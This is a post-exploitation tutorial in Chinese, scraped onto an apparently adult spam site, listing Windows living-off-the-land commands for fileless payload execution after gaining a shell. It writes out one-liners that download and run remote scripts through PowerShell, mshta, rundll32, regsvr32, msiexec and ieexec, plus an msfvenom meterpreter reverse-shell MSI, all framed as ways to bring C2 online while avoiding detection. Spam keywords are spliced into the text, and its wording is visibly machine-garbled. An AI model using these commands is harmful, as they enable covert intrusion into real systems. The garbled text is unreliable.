咪咪色网

义务教育你的位置:咪咪色网 > 义务教育 >

柏木ゆう最新番号 后浸透之windows中无文献落地践诺门径

发布日期:2024-08-08 07:07    点击次数:69

柏木ゆう最新番号 后浸透之windows中无文献落地践诺门径

{ }

图片柏木ゆう最新番号柏木ゆう最新番号

彩虹小马绪言

在咱们浸透历程中,当getshell或者大要践诺敕令后需要上线C2时,一般是践诺下载(或上传)将文献写入倡导劳动器后践诺。这种容貌会留住一个二进制文献可能会被扫描查杀。

而通过一些系统或组件自带敕令进行文献不落地践诺,这种容貌不会留住二进制文献,更具有潜藏性。本文将列举一些文献不落地的敕令门径。

powershell

在win7/2008运行引入的一种跨平台的任务自动化不断决策,由敕令行 shell、剧本话语和设置不断框架构成。powershell功能十分远大。一瞥敕令即可径直践诺费力文献。文献旅途:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

相沿系统: >= win7/win2008

用法:

powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx/test.ps1'))'

图片

mshta

mshta.exe是Windows操作系统内置门径,用于践诺.hta文献(HTML应用门径)

文献旅途:

C:\Windows\System32\mshta.exe

相沿系统: win7-win11

用法:

vbscript:Close(Execute('GetObject(''script:http://webserver/payload.sct'')')) mshta http://webserver/payload.hta /cmd /c mshta.exe javascript:a(GetObject('script:http://1.1.1.1/m.sct')).Exec();close();

图片

rundll32

Rundll32.exe是win系统相配进击的中枢门径。它的作用是践诺DLL文献,在敕令行下调用动态贯穿门径库。系统中还有一个Rundll64.exe文献,它的真谛是'践诺64位的DLL文献',这两个是病毒软件制作家的最爱,亦然在以往病毒分析敷陈中出现最多的应用媒介

文献旅途:

C:\Windows\System32\rundll32.exe

相沿系统: win7 -win11

用法:

费力加载:C:\Windows\SysWOW64\rundll32.exe javascript:'\..\mshtml,RunHTMLApplication';document.write();GetObject('script:http://192.168.1.4/Rundll32_shellcode'

践诺费力文献

图片

图片

Regsvr32

Regsvr32是用于注册COM组件,Windows 敕令行下提供的注册控件或者卸载控件的敕令

文献旅途:

C:\Windows\System32\Regsvr32.exe

相沿系统: win7 -win11

用法:

regsvr32 /u /n /s /i:http://192.168.173.45:8800/file.sct scrobj.dll

图片

图片

Msiexec.exe

win中枢应用,用于装配msi包。是Windows Installer的一部分。

文献旅途:

C:\Windows\System32\msiexec.exe

相沿系统: win7 -win11

用法:

msiexec.exe /q /i http://192.168.173.45/test.msi
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.14.1 -f msi > test.msi msiexec.exe /q /i http://192.168.173.45/test.msi

图片

IEexec

IEexec.exe是.NET Framework附带门径,.NET框架在win系统自带。而同目次下的Csc.exe即是C#的话语编译器文献旅途:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe

相沿系统: win7 -win11

用法:

cd C:\Windows\Microsoft.NET\Framework64\v2.0.50727 caspol -s off ieexec http://ip:8080/test.exe追念

这里只列举了一些常用不落地践诺门径柏木ゆう最新番号,诚然还有好多门径比如把握特定版块中组件的门径。使用这些门径需要知足出网条目,实战中依然需要开畅想路,找到现存场景中的缺点才智bypass

本站仅提供存储劳动,整个实质均由用户发布,如发现存害或侵权实质,请点击举报。

Powered by 咪咪色网 @2013-2022 RSS地图 HTML地图

Copyright Powered by站群 © 2013-2022 版权所有